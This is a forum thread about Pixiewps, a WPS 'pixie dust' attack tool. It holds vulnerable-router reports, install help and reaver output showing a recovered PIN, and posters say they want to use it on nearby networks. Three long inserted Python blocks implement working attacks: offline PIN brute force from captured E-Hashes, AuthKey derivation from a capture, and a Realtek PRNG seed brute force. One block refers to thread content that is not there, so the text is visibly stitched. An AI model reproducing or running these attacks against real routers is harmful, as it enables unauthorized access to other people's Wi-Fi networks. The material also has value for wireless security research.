
Thread: Pixiewps: wps pixie dust attack tool

  1. #1
    Quote Originally Posted by wiire View Post
    This attack could be potentially extended to more routers if more research is done. There are some other manufacturers that have not been checked yet (like Marvell, Intel, Qualcomm, Realtek...). Also, good entropy on embedded systems (with limited resources) is always a problem especially at boot.

    The devices that are not affected are probably the ones which use hardware random number generators. Also systems running Linux / Hostapd seem secure.

    I have nearly zero experience with this kind of stuff, so if you wanna jump in, do it. Anyone can contribute.

    Is there any chance of this working on TP-LINK in the future?

    TP-LINK like this http://www.maytinhviettrung.com/1_ht...TL-WR740ND.jpg


  3. #3
    I can't install pixiewps. I get this error when I type "make" in its src directory.

    gcc -o pixiewps pixiewps.c -lssl -lcrypto -Wall -Werror
    pixiewps.c:33:26: fatal error: openssl/hmac.h: No such file or directory
    compilation terminated.
    make: *** [all] Error 1

  4. #4
    Did you install the development libraries for OpenSSL?

    Cheers

  5. #5
    Quote Originally Posted by WaLkZ View Post
    Is there any chance this to work on TP-LINK in the future ?

    TP-LINK like this http://www.maytinhviettrung.com/1_ht...TL-WR740ND.jpg
    I doubt it... As far as I remember, the TL-WR740N uses an Atheros chipset and runs Linux; not feasible with the PRNG keyspace.

  6. #6
    Quote Originally Posted by soxrok2212 View Post
    I doubt it... As far as I remember, the TL-WR740N uses an Atheros chipset and runs Linux; not feasible with the PRNG keyspace.
    Finally I was able to create my account in this forum.

    I already emailed wiire about the tests I've done.

    First of all, I made a modified version of reaver to facilitate the tests; this modification already runs a pixie test when a pin is tested in reaver.

    [P] E-Nonce: 41:f2:8c:82:53:3b:df:........
    [P] PKE: 6b:0e:22:cb:cd:21:........
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Number: RT2860
    [+] Received message M1
    [P] AuthKey: f7:fb:bc:21:ab:3b:99:70:36:8e:f1:a0:........
    [+] Sending message M2
    [P] E-Hash1: 1e:d6:12:27:8f:12:28:21:9a:54:.........
    [P] E-Hash2: d:f:34:e:ac:55:a4:9e:b3:95:31:7a:61:b0:........
    [Pixie-Dust]
    [Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] PSK1: 76:46:96:c7:5d:e4:8a:86:.......
    [Pixie-Dust][*] PSK2: 1b:5e:3e:6b:19:89:4b:5c:.......
    [Pixie-Dust] [+] WPS pin: 41368541
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    [+] Received message M3
    [+] Sending message M4

    If someone wants this version, tell me.



    Now regarding the TP-Link.

    I believe it may be vulnerable to another type of problem.

    I have a TP-Link 740N v1; it is a very old router, I think from 2004-2005.


    It has the Atheros chipset, runs Linux and uses hostap together with /dev/random.

    But this firmware version, for example, has a problem in the generation of random numbers; it may be that it is this firmware version that has this problem.

    The seed for generating the random number is based on the router's date (date, time, seconds).

    Every time I restart the modem, the seed to generate the random number is the same. So it is possible to brute-force all dates, hours and seconds to find the current state of the seed. This makes it possible to generate future seeds to brute-force the pin.


    It may be that this problem is only in this firmware version; I do not have other routers to test or compare, and without having them in hand it is difficult to do the tests.

    But this problem is certainly present in many other models of routers.


    Today I came across a router where E-Hash1 and E-Hash2 were identical, and I needed to make a modification in pixie for it to do the brute force correctly.

    I will continue to develop and when I have more news I will come back to post.

    Sorry for the English, I used a translator.

  7. #7
    Quote Originally Posted by t6_x View Post
    Now regarding the TP-Link.

    I believe it may be vulnerable to another type of problem.

    I have a TP-Link 740N v1; it is a very old router, I think from 2004-2005.


    It has the Atheros chipset, runs Linux and uses hostap together with /dev/random.

    But this firmware version, for example, has a problem in the generation of random numbers; it may be that it is this firmware version that has this problem.

    The seed for generating the random number is based on the router's date (date, time, seconds).

    Every time I restart the modem, the seed to generate the random number is the same. So it is possible to brute-force all dates, hours and seconds to find the current state of the seed. This makes it possible to generate future seeds to brute-force the pin.


    It may be that this problem is only in this firmware version; I do not have other routers to test or compare, and without having them in hand it is difficult to do the tests.

    But this problem is certainly present in many other models of routers.


    Today I came across a router where E-Hash1 and E-Hash2 were identical, and I needed to make a modification in pixie for it to do the brute force correctly.

    I will continue to develop and when I have more news I will come back to post.
    If you can make this brute-force attack work on the TP-Link 740N in the future it will be awesome, because 95% of the networks around me are TP-Link 740N with WPS turned on.

  8. #8
    Quote Originally Posted by WaLkZ View Post
    If you can do this brute-force attack in the fiture to work on tp-link 740n it will be awesome because 95% of networks around me are tp-link 740n with turned on WPS.
    I have the same problem!
    http://www44.zippyshare.com/v/aEY5Jq61/file.html

  9. #9
    Quote Originally Posted by t6_x View Post
    Today I met a router where the E-Hash1 and the E-Hash2 was identical and there needed to make a modification in pixie for him to do the bruteforce correctly.
    Someone I am working with has also found an AP where E-Hash1 = E-Hash2. I speak a little Spanish and the other guy speaks it fluently... I guess you do too? Anyways, if you could e-mail me that would be great. My e-mail is my user name @gmail.com

    Thanks!

  10. #10

    Hello. RT2860

    Hi,

    Please, I'm trying to test a Ralink RT2860 but it constantly gives me an error "wps transaction failed (0x04)" and I can't get M3 or M4 messages.

    How can I get the E-Hashes out of this?

  11. #11
    Quote Originally Posted by t6_x View Post
    Finally I was able to create my account in this forum.

    I already emailed wiire about the tests I've done.

    First of all, I made a modified version of reaver to facilitate the tests; this modification already runs a pixie test when a pin is tested in reaver.

    [P] E-Nonce: 41:f2:8c:82:53:3b:df:........
    [P] PKE: 6b:0e:22:cb:cd:21:........
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Number: RT2860
    [+] Received message M1
    [P] AuthKey: f7:fb:bc:21:ab:3b:99:70:36:8e:f1:a0:........
    [+] Sending message M2
    [P] E-Hash1: 1e:d6:12:27:8f:12:28:21:9a:54:.........
    [P] E-Hash2: d:f:34:e:ac:55:a4:9e:b3:95:31:7a:61:b0:........
    [Pixie-Dust]
    [Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] PSK1: 76:46:96:c7:5d:e4:8a:86:.......
    [Pixie-Dust][*] PSK2: 1b:5e:3e:6b:19:89:4b:5c:.......
    [Pixie-Dust] [+] WPS pin: 41368541
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    [+] Received message M3
    [+] Sending message M4

    If someone wants this version, tell me.
    Hello,

    I'm trying to test a Ralink RT2860 (exactly the same as the example above) but it constantly gives me the error "WPS transaction failed (0x04)" and I can't get any M3/M4 messages or E-Hashes. Please, any solutions?
    Last edited by whitetsagan; 2016-04-13 at 08:55.

  12. #12
    TP-Link is an Atheros addict, but 4 models of TP-Link AP have at least one version with a Ralink chipset, and these ones may well be affected (one was reported as such, but we never got the data).
    These are the suspect models (model, hardware version, FCC ID, Wi-Fi, SoC, flash, RAM, radio):

    TP-LINK TD-W8901N   v1    TE7TDW8901NV1   bgn  RT63365E  2 MiB  8 MiB   RT5390
    TP-LINK TD-W8951ND  v5    TE7TDW8951NDV5  bgn  RT63365E  2 MiB  8 MiB   RT5390R
    TP-LINK TD-W8961NB  v3.0  -               bgn  RT63365E  2 MiB  8 MiB   -
    TP-LINK TD-W8961ND  v3.x  TE7TDW8961NDV3  bgn  RT63365E  -      64 MiB  -
    TP-LINK TD-W8968    v2    TE7TDW8968V2    bgn  RT63365E  8 MiB  64 MiB  -

  13. #13
    Quote Originally Posted by kcdtv View Post
    TP-Link is an Atheros addict, but 4 models of TP-Link AP have at least one version with a Ralink chipset, and these ones may well be affected (one was reported as such, but we never got the data).
    Vendor: TP-LINK
    Model: TD-W8951ND
    Firmware: 3.0.1 Build 110720 Rel.40612
    Chipset: Ralink (RT2860)

    Confirmed vulnerable.

  14. #14
    Quote Originally Posted by wiire View Post
    Vendor: TP-LINK
    Model: TD-W8951ND
    Firmware: 3.0.1 Build 110720 Rel.40612
    Chipset: Ralink (RT2860)

    Confirmed vulnerable.
    Have tested the following routers with these results: "WPS pin not found!"

    1. WPS Manufacturer: D-Link
    WPS Model Number: DIR-615

    2. WPS Manufacturer: ASUSTeK Computer Inc.
    WPS Model Number: RT-N12

    3. WPS Manufacturer: TP-LINK
    WPS Model Number: 1.0

  15. #15
    Quote Originally Posted by Jynn View Post
    Have tested the following routers with these results: "WPS pin not found!"

    1. WPS Manufacturer: D-Link
    WPS Model Number: DIR-615

    2. WPS Manufacturer: ASUSTeK Computer Inc.
    WPS Model Number: RT-N12

    3. WPS Manufacturer: TP-LINK
    WPS Model Number: 1.0
    Also D-Link DIR-501

  16. #16
    I'm interested in your modified reaver version. Does it also test the pin to get the actual passphrase as well?

    Quote Originally Posted by t6_x View Post
    Finally I was able to create my account in this forum.

    I already emailed wiire about the tests I've done.

    First of all, I made a modified version of reaver to facilitate the tests; this modification already runs a pixie test when a pin is tested in reaver.

    [P] E-Nonce: 41:f2:8c:82:53:3b:df:........
    [P] PKE: 6b:0e:22:cb:cd:21:........
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Number: RT2860
    [+] Received message M1
    [P] AuthKey: f7:fb:bc:21:ab:3b:99:70:36:8e:f1:a0:........
    [+] Sending message M2
    [P] E-Hash1: 1e:d6:12:27:8f:12:28:21:9a:54:.........
    [P] E-Hash2: d:f:34:e:ac:55:a4:9e:b3:95:31:7a:61:b0:........
    [Pixie-Dust]
    [Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] PSK1: 76:46:96:c7:5d:e4:8a:86:.......
    [Pixie-Dust][*] PSK2: 1b:5e:3e:6b:19:89:4b:5c:.......
    [Pixie-Dust] [+] WPS pin: 41368541
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    [+] Received message M3
    [+] Sending message M4

    If someone wants this version, tell me.

  17. #17
    Pixiewps 1.0.5 is out!

    Added a partial implementation of a new attack!

    Vulnerable devices: Realtek (ES-1 = ES-2 = Enrollee nonce). This attack doesn't always work. Also be sure not to use --dh-small with this one! Get the PKR from Wireshark and supply the Enrollee Nonce. Test and report!

    Thanks to Dominique Bongard (again) and also to soxrok2212.

    Bongard tweet: https://twitter.com/Reversity/status/586610963354357762
    Rand function to implement: https://github.com/skristiansson/uCl...lib/random_r.c
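An added worked example (not code from this thread, from pixiewps or from the modded reaver) of the offline step behind two of the outputs above: t6_x's Ralink RT2860 run, where pixiewps found ES-1 = ES-2 = 0, and wiire's 1.0.5 note that the Realtek variant uses ES-1 = ES-2 = E-Nonce. The script plays the AP side (computing E-Hash1/E-Hash2 from a PIN and its secret nonces, as M3 carries them) and the attacker side (rederiving the PIN from the hashes given a guess for those nonces). AuthKey, PKE, PKR, E-Nonce and the "good entropy" nonces are constructed placeholders, and the candidate labels "zero" and "enonce" are names chosen here.

```python
import hashlib
import hmac

ZERO16 = b"\x00" * 16

# Constructed stand-ins (not from a capture): the AuthKey as derived after M2,
# the two 1536-bit DH public keys, the enrollee nonce from M1, and two secret
# nonces with real entropy for the "not vulnerable" case.
AUTHKEY = hashlib.sha256(b"constructed AuthKey placeholder").digest()
PKE = bytes((i * 7 + 3) & 0xff for i in range(192))
PKR = bytes((i * 11 + 5) & 0xff for i in range(192))
ENONCE = bytes(range(16))
STRONG_ES1 = hashlib.sha256(b"good entropy 1").digest()[:16]
STRONG_ES2 = hashlib.sha256(b"good entropy 2").digest()[:16]


def wps_pin_checksum(pin7: int) -> int:
    """Checksum digit for a 7-digit PIN body (the WSC spec's weighted-sum rule)."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def h(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.sha256).digest()


def enrollee_hashes(authkey, pke, pkr, pin: str, es1: bytes, es2: bytes):
    """AP side: E-Hash1/E-Hash2 as sent in M3. PSK1/PSK2 are the first 128 bits
    of HMAC(AuthKey, PIN half); ES-1/ES-2 are the secrets that must be unguessable."""
    psk1 = h(authkey, pin[:4].encode())[:16]
    psk2 = h(authkey, pin[4:].encode())[:16]
    return h(authkey, es1 + psk1 + pke + pkr), h(authkey, es2 + psk2 + pke + pkr)


def pixie_dust(authkey, pke, pkr, ehash1, ehash2, es1=ZERO16, es2=ZERO16):
    """Attacker side: with ES-1/ES-2 guessed, each PIN half is checked offline
    against its E-Hash. Returns the 8-digit PIN, or None if the guess was wrong."""
    first = None
    for half in range(10000):
        psk1 = h(authkey, f"{half:04d}".encode())[:16]
        if hmac.compare_digest(h(authkey, es1 + psk1 + pke + pkr), ehash1):
            first = half
            break
    if first is None:
        return None
    for body in range(1000):                  # digits 5-7; digit 8 is the checksum
        second = body * 10 + wps_pin_checksum(first * 1000 + body)
        psk2 = h(authkey, f"{second:04d}".encode())[:16]
        if hmac.compare_digest(h(authkey, es2 + psk2 + pke + pkr), ehash2):
            return f"{first:04d}{second:04d}"
    return None


def recover(authkey, pke, pkr, enonce, ehash1, ehash2):
    """Try the two weak-nonce patterns named in the thread: ES-1 = ES-2 = 0
    (the Ralink output above) and ES-1 = ES-2 = E-Nonce (Realtek, 1.0.5)."""
    for label, es in (("zero", ZERO16), ("enonce", enonce)):
        pin = pixie_dust(authkey, pke, pkr, ehash1, ehash2, es, es)
        if pin is not None:
            return label, pin
    return None


def demo():
    eh1, eh2 = enrollee_hashes(AUTHKEY, PKE, PKR, "41368541", ZERO16, ZERO16)
    return recover(AUTHKEY, PKE, PKR, ENONCE, eh1, eh2)


if __name__ == "__main__":
    print(demo())          # ('zero', '41368541')
```

The first half costs at most 10,000 HMACs and the second at most 1,000 (the eighth digit is a checksum), so a found PIN takes well under a second. When neither candidate matches, the secret nonces were not predictable from these two patterns, which is the "WPS pin not found!" outcome several posters report; pixiewps then falls back to its other modes.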

  18. #18
    I do not have much practical interest in this attack vector other than as a POC, and probably won't spend a ton of time testing it out or using it, but this is still some really nice work! Kudos.


  20. #20
    I have a TP-LINK TD-W8961ND with the same Ralink chipset (RT2860), but when I tried reaver to get the info it always gets stuck at M2. Is there a solution please?

  21. #21
    pixie is not installing.
    It says:
    gcc -o pixiewps pixiewps.c -lssl -lcrypto -Wall -Werror
    pixiewps.c:46:26: fatal error: openssl/hmac.h: No such file or directory
    compilation terminated.
    make: *** [all] Error 1
    Even libssl-dev isn't installing. It's searching for 1.0.1e-2+deb7u12 but the repository has 1.0.1e-2+deb7u16.
    What to do...???

  22. #22
    Quote Originally Posted by Frost.Elrick View Post
    pixie is not installing.
    It says:
    gcc -o pixiewps pixiewps.c -lssl -lcrypto -Wall -Werror
    pixiewps.c:46:26: fatal error: openssl/hmac.h: No such file or directory
    compilation terminated.
    make: *** [all] Error 1
    Even libssl-dev isn't installing. It's searching for 1.0.1e-2+deb7u12 but the repository has 1.0.1e-2+deb7u16.
    What to do...???
    Try this command: gcc -o pixiewps pixiewps.c -lssl -lcrypto

  23. #23

    Still No Help

    Quote Originally Posted by slim76 View Post
    Try this command: gcc -o pixiewps pixiewps.c -lssl -lcrypto
    It also gives the same error.
    libssl-dev isn't installing; maybe that is causing the problem, but I cannot get it even after apt-get update.

  24. #24
    The position of the reaver wpc files when using these modded reaver programs is now:

    /usr/local/etc/reaver/

    File names are the 12-digit MAC address (no colons) of the target followed by .wpc

    Any unfinished work previously done with the stock version must be copied or moved from the /etc/reaver/ folder to the /usr/local/etc/reaver/ folder. To confirm file position use the following command in the terminal window.

    locate "*.wpc"

    MTeams
    Last edited by mmusket33; 2015-04-27 at 03:31.

  25. #25
    This thing is wicked, thank you so much. It makes wifi testing so much quicker, but I'll forget all the commands. Oh well, who needs typing when you have a script.

  26. #26
    With this it always gives me pin not found!!!

    Is there any solution?

  27. #27
    To: FrostElrick

    Try this:

    Copy the following data between the #### to a text file with leafpad in root and name the file sources.list

    ################

    #placed in /etc/apt/ folder
    deb http://http.kali.org/kali kali main contrib non-free
    deb-src http://http.kali.org/kali kali main contrib non-free
    deb http://security.kali.org/kali-security kali/updates main contrib non-free
    deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
    deb http://http.kali.org /kali main contrib non-free
    deb http://http.kali.org /wheezy main contrib non-free

    ################
    Go to the /etc/apt folder and rename the existing sources.list file to sources.list.orig

    ie sources.list.original

    Now copy the sources.list file in root to the /etc/apt folder


    Get an internet connection, open a terminal window and run:


    sudo apt-get install libssl-dev
    sudo apt-get install libpcap-dev
    sudo apt-get install libsqlite3-dev


    Now install your modded reaver and pixiewps


    Now go to your /etc/apt folder, erase your sources.list, then rename sources.list.orig back to sources.list

    Musket Teams
    Last edited by mmusket33; 2015-04-28 at 00:49.

  28. #28
    You could try using FrankenScript to download it and set it up, you can then browse the setup output in the frankenscript window by scrolling back.
    If you still get an error then I'd guess your kali installation is broken in some way.

  29. #29
    Pixiewps 1.1 is out!

    Download: GitHub

    What's new:
    - The previous attack is now fully implemented
    - AuthKey computation if --dh-small is specified (also in Reaver). The data can be gathered from a .cap file (manually)
    - Better input parsing with parameters length check
    - More user friendly. Added some examples of use in the usage screen.

    NOTE:
    - In this version the computer/machine time you're running pixiewps on is IMPORTANT. Be sure it's set to the right date and time
    - Although pixiewps can now be run without a modded version of Reaver (using --dh-small), the modded version made by t6_x and datahead is still recommended

    The (almost) full bruteforce for the new attack is performed using the option -f (--force). I say almost because it starts bruteforcing around the current machine time and goes backwards.

    What is not implemented yet but may come in (a not near) future (so don't ask ):
    - Multithreading (I tried to do a 'quick and dirty' implementation but it did more harm than good)
    - Read all data needed from a .cap (always with --dh-small)

    Below an example of AuthKey computation:

    Last edited by wiire; 2015-05-01 at 19:43. Reason: Fixed some typos
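The AuthKey example announced at the end of the post above did not survive on this page, so here is an added example (not wiire's code) of what the --dh-small AuthKey computation in 1.1 amounts to: with the registrar's DH private key fixed to 1, PKR is 2 and the shared secret is PKE itself, so DHKey = SHA-256(PKE), KDK = HMAC-SHA256(DHKey, E-Nonce || EnrolleeMAC || R-Nonce), and AuthKey is the first 256 bits of the WSC KDF output. The script pulls the fields from reaver-style "[P] Name: aa:bb:..." lines and the BSSID from the "Associated with" line; the log lines, nonces, PKE and MAC it runs on are constructed, and the dictionary keys it returns are just the field names as reaver prints them. It refuses a session whose PKR is not 2, because then the shortcut does not apply and the real private key is needed.

```python
import hashlib
import hmac
import re

WPS_KDF_LABEL = b"Wi-Fi Easy and Secure Key Derivation"
WPS_KDF_BITS = 640                        # AuthKey(256) || KeyWrapKey(128) || EMSK(256)
PKR_DH_SMALL = (2).to_bytes(192, "big")   # g^1 mod p: the registrar key with --dh-small

FIELD_RE = re.compile(r"^\s*\[P\] ([^:]+?):\s*((?:[0-9a-fA-F]{2}:)+[0-9a-fA-F]{2})\s*$", re.M)
BSSID_RE = re.compile(r"Associated with ([0-9a-fA-F]{2}(?::[0-9a-fA-F]{2}){5})")


def parse_reaver_fields(log: str) -> dict:
    """Collect '[P] Name: aa:bb:..' lines (the modded-reaver format seen in this
    thread) into {name: bytes}; non-hex lines (manufacturer, model, serial) are skipped."""
    return {name.strip(): bytes.fromhex(value.replace(":", "")) for name, value in FIELD_RE.findall(log)}


def parse_bssid(log: str) -> bytes:
    """The AP is the enrollee here, so its BSSID is the EnrolleeMAC in the KDK."""
    m = BSSID_RE.search(log)
    if not m:
        raise ValueError("no 'Associated with <bssid>' line in log")
    return bytes.fromhex(m.group(1).replace(":", ""))


def wps_kdf(key: bytes, label: bytes, total_bits: int) -> bytes:
    """WSC key derivation: HMAC-SHA256(key, i || label || total_bits), i = 1..n."""
    out = b""
    for i in range(1, (total_bits + 255) // 256 + 1):
        msg = i.to_bytes(4, "big") + label + total_bits.to_bytes(4, "big")
        out += hmac.new(key, msg, hashlib.sha256).digest()
    return out[: total_bits // 8]


def is_dh_small(pkr: bytes) -> bool:
    return pkr == PKR_DH_SMALL


def authkey_dh_small(pke, pkr, e_nonce, r_nonce, enrollee_mac) -> bytes:
    """AuthKey for a session run with --dh-small. With the registrar private key
    equal to 1 the shared secret is PKE^1 mod p = PKE, so no modular
    exponentiation (and no 1536-bit prime) is needed."""
    if (len(pke), len(pkr), len(e_nonce), len(r_nonce), len(enrollee_mac)) != (192, 192, 16, 16, 6):
        raise ValueError("unexpected field length")
    if not is_dh_small(pkr):
        raise ValueError("PKR is not 2: not a --dh-small session, DHKey needs the registrar private key")
    dhkey = hashlib.sha256(pke).digest()
    kdk = hmac.new(dhkey, e_nonce + enrollee_mac + r_nonce, hashlib.sha256).digest()
    return wps_kdf(kdk, WPS_KDF_LABEL, WPS_KDF_BITS)[:32]


def authkey_from_log(log: str) -> bytes:
    f = parse_reaver_fields(log)
    return authkey_dh_small(f["PKE"], f["PKR"], f["E-Nonce"], f["R-Nonce"], parse_bssid(log))


def _hexcolon(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


# Constructed M1/M2 values in the reaver output format (not a real capture).
SAMPLE_PKE = bytes((i * 37 + 11) & 0xff for i in range(192))
SAMPLE_LOG = "\n".join([
    "[+] Associated with 02:00:5e:00:01:aa (ESSID: lab-ap)",
    "[+] Trying pin 12345670.",
    "[P] E-Nonce: " + _hexcolon(bytes(range(16))),
    "[P] PKE: " + _hexcolon(SAMPLE_PKE),
    "[P] WPS Manufacturer: Example Corp.",
    "[P] WPS Model Number: 1.0",
    "[P] Access Point Serial Number: 123456789012347",
    "[+] Received M1 message",
    "[P] R-Nonce: " + _hexcolon(bytes(range(16, 32))),
    "[P] PKR: " + _hexcolon(PKR_DH_SMALL),
])

if __name__ == "__main__":
    print("AuthKey:", _hexcolon(authkey_from_log(SAMPLE_LOG)))
```

The same fields can be read out of a .cap by hand (M1 carries E-Nonce and PKE, M2 carries R-Nonce and PKR), which is the "offline" route the release note describes; the PKR check is the thing to do first, since a capture from a normal reaver session has a full random PKR and this shortcut silently produces a wrong AuthKey without it.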

  30. #30
    @wiire all always SUPER thanks!!

  31. #31
    Thanks for the new update, but it starts to get confusing with all these arguments now can we get a small tutorial ?

  32. #32
    Cant wait to try this new version. I will report back soon.


  34. #34
    So... this works for Atheros now?

  35. #35
    What a beautiful Saturday midday!
    Sun is shining, day off and this magnificent version 1.1 is out!
    Great job wiire!
    So I can confirm that all devices from the rtl819x projects are vulnerable if their firmware is based on the Realtek SDK (but why wouldn't it be based on the tool designed and provided by Realtek to create them?)

    To make it a little hard for pixiewps and to really fully try this new -f option (brute force on the seed, going backwards in time) I reset my Realtek device to factory default (first build time in 2012),
    on a cheap laptop with a poor microprocessor (around 600 keys/sec with aircrack-ng).


    Quote Originally Posted by wn722
    So... this works for Atheros now?

    You should read back wiire's posts in this thread.

    Quote Originally Posted by Desuu
    Thanks for the new update, but it starts to get confusing with all these arguments now can we get a small tutorial ?
    That's just three more arguments (I think).
    Basically, if your router has a Realtek chipset and you don't get the PIN using pixiewps 1.0 (or using pixiewps 1.1 without the new features), it will work with the new pixiewps 1.1 using the -f argument.
    Notice the possibility to compute the AuthKey from a *.cap file, which allows you to make a full "offline attack" just by grabbing the required strings from your M packets (the small DH key option, -S, has to be used with reaver and pixiedust).
    Last edited by kcdtv; 2015-05-02 at 10:44.

  36. #36
    @kcdtv
    You should try using -v 3. It prints the seed (Unix datetime) into human readable date and time.

    Also I've been told there are routers that, after failing to retrieve the right date and time from the Internet, reset it to 0 (1st January 1970).

    Any problems compiling on Ubuntu at all?

    @wn722
    I'm afraid that Atheros and Marvell will remain unbreakable.

    As a side note Atheros hired Jouni Malinen the creator of hostapd in 2008 and in 2011 was bought by Marvell. Read it from Wikipedia.

  37. #37
    No problems at all in Ubuntu & Xubuntu.
    You should try using -v 3. It prints the seed (Unix datetime) into human readable date and time.
    Sweet!
    Also I've been told there are routers that, after failing to retrieve the right date and time from the Internet, reset it to 0 (1st January 1970).
    lol
    I can tell you that is not the case with rtl8192x based routers (I have an Alfa AIP-W525H and a Totolink NR301RT) that I have been using for years... the farthest they go back to is the last build... both of mine are from 2012 and, checking, I think (but I may be wrong) that we shouldn't have to go further backward than the date that appears in the WPS probes: EV-2010-09-20, as I have the same for both routers, which are from different months; it seems to be a generic base date/time.

    As a side note Atheros hired Jouni Malinen the creator of hostapd in 2008 and in 2011
    These guys from Atheros know who they hire! For sure we won't get ES-1=ES-2=0 with somebody like this behind the code XD

  38. #38
    Quote Originally Posted by Desuu View Post
    Thanks for the new update, but it starts to get confusing with all these arguments now can we get a small tutorial ?
    I think soxrok is going to upload a new tutorial. There are some examples at the bottom of the usage screen. But basically what you normally want to do is launch pixiewps without --force. Then, if the pin is not found and pixiewps prints a warning saying that the router might be vulnerable, you may want to try with --force. What pixiewps does is use the current time and date as reference and go backwards trying to recover the seed, because the router's time and date might not be right (like set at factory time).

    Also I set the default verbosity level to 2 but you may probably want to set it to 3.

  39. #39
    Quote Originally Posted by wiire View Post
    Yes, sorry, I should've clarified. The --force option is used only for what I call mode 4, which is Realtek's PRNG seed bruteforce. I was planning on adding mode selection but I didn't, and I left those modes on the usage screen; I didn't want to explicitly refer to vendors in the program.

    The best practice is to run the program without -f and, if you get a warning saying that the router might be vulnerable to mode 4, it means that you may want to try again with -f or with another set of data that could lead you to (mode 2) secret nonces = enrollee nonce. I also refer to modes because that's how the program runs internally: it tries for every possible vulnerability. When it bruteforces the new PRNG though (that is mode 4) it normally tests only a small window of time (approximately 10 days), because the new bruteforce is more power consuming.

    So --force is basically used only if the router has its time set to the past (more than 10 days ago). To exhaust it probably takes 20-30 mins. Also -f doesn't take any argument. The program just doesn't complain if you pass it some extra arguments. I gotta fix that.

    Also would you mind replying on the pixiewps thread for program related questions? Thanks.

    Thank you very much for clarifying Wiire.
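An added example (not pixiewps code) modelling what wiire calls mode 4, the Realtek PRNG seed brute force, in Python. The generator is glibc/uClibc random_r() TYPE_3, the random_r.c wiire linked in the 1.0.5 post. How the enrollee turns its outputs into nonces is an assumption made here, not something the thread states: srand(time), then four 16-bit rand() outputs per nonce, each stored in the low half of a big-endian 32-bit word (the 00:00:xx:xx shape of the E-Nonce in Saydamination's reaver output further down the thread), E-Nonce first, then ES-1 and ES-2. The router clock, attacker clock and search window are constructed; a real --force run in C walks back years, this one only two hours.

```python
from datetime import datetime, timezone

# Constructed scenario (not a real capture): the AP seeded its PRNG from a clock
# 50 minutes behind the attacker's, well inside pixiewps's default window.
ROUTER_CLOCK = 1336867200            # 2012-05-13 00:00:00 UTC
ATTACKER_NOW = ROUTER_CLOCK + 3000
NONCE_WORDS = 4


def glibc_random_outputs(seed: int, count: int) -> list:
    """glibc/uClibc random_r(), TYPE_3 (degree 31, separation 3). Returns the
    first `count` 31-bit outputs for `seed`, which must fit a non-negative int32
    (a Unix time does)."""
    if not 0 <= seed < 2 ** 31:
        raise ValueError("seed must be a non-negative int32")
    if seed == 0:                    # glibc substitutes 1 for a zero seed
        seed = 1
    r = [0] * (344 + count)
    r[0] = seed
    for i in range(1, 31):           # Park-Miller LCG fills the initial table
        r[i] = (16807 * r[i - 1]) % 2147483647
    for i in range(31, 34):
        r[i] = r[i - 31]
    for i in range(34, 344 + count): # additive lagged feedback, mod 2^32
        r[i] = (r[i - 31] + r[i - 3]) & 0xffffffff
    # srandom() discards the first 310 feedback results (indices 34..343);
    # output k is r[k + 344] with the low bit dropped
    return [r[i] >> 1 for i in range(344, 344 + count)]


def model_enrollee_nonces(clock: int):
    """ASSUMED enrollee behaviour (see lead-in): E-Nonce, ES-1, ES-2 are drawn
    in that order, four rand() & 0xffff values each, big-endian 32-bit words."""
    outs = glibc_random_outputs(clock, 3 * NONCE_WORDS)
    words = [(o & 0xffff).to_bytes(4, "big") for o in outs]
    return b"".join(words[0:4]), b"".join(words[4:8]), b"".join(words[8:12])


def looks_like_16bit_words(nonce: bytes) -> bool:
    """Quick tell for this shape: every 32-bit word has a zero high half."""
    return len(nonce) == 16 and all(nonce[i:i + 2] == b"\x00\x00" for i in range(0, 16, 4))


def recover_seed(enonce: bytes, now: int, window: int):
    """Walk the seed backwards from the attacker's clock until the modelled
    E-Nonce matches (the shape of --force, which goes back much further)."""
    if not looks_like_16bit_words(enonce):
        return None
    target = [int.from_bytes(enonce[i:i + 4], "big") for i in range(0, 16, 4)]
    for seed in range(now, max(now - window, 0), -1):
        outs = glibc_random_outputs(seed, NONCE_WORDS)
        if all((o & 0xffff) == t for o, t in zip(outs, target)):
            return seed
    return None


def predict_secret_nonces(seed: int):
    """Once the seed is known ES-1 and ES-2 follow, and pixie dust gives the PIN."""
    _, es1, es2 = model_enrollee_nonces(seed)
    return es1, es2


def seed_to_human(seed: int) -> str:
    """What -v 3 prints: the recovered seed as a date and time."""
    return datetime.fromtimestamp(seed, timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def demo():
    enonce, es1, es2 = model_enrollee_nonces(ROUTER_CLOCK)   # what M1 would carry
    seed = recover_seed(enonce, ATTACKER_NOW, 2 * 3600)
    human = seed_to_human(seed) if seed is not None else None
    return seed, human, predict_secret_nonces(seed) == (es1, es2) if seed is not None else False


if __name__ == "__main__":
    print(demo())
```

Each candidate seed costs a full table initialisation, which is why the C implementation matters once the window grows from hours to years and why a router clock stuck at its build date (or at 1970) is the case --force exists for; the window check at the end of the test shows the "not found inside the default window" outcome that the mode 4 warning describes.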

  40. #40
    Hello, @Wiire @Kcdtv


    Chipset: Realtek RTL8671

    Computer: test computer, processor 1.9 GHz, 1 GB RAM (800 keys/sec)

    Command: pixiewps -e -r -s -z -a -n -f

    I have been waiting for 3 hours and pixiewps is still continuing...

    What can I do? Suggestions?

    a) Give up

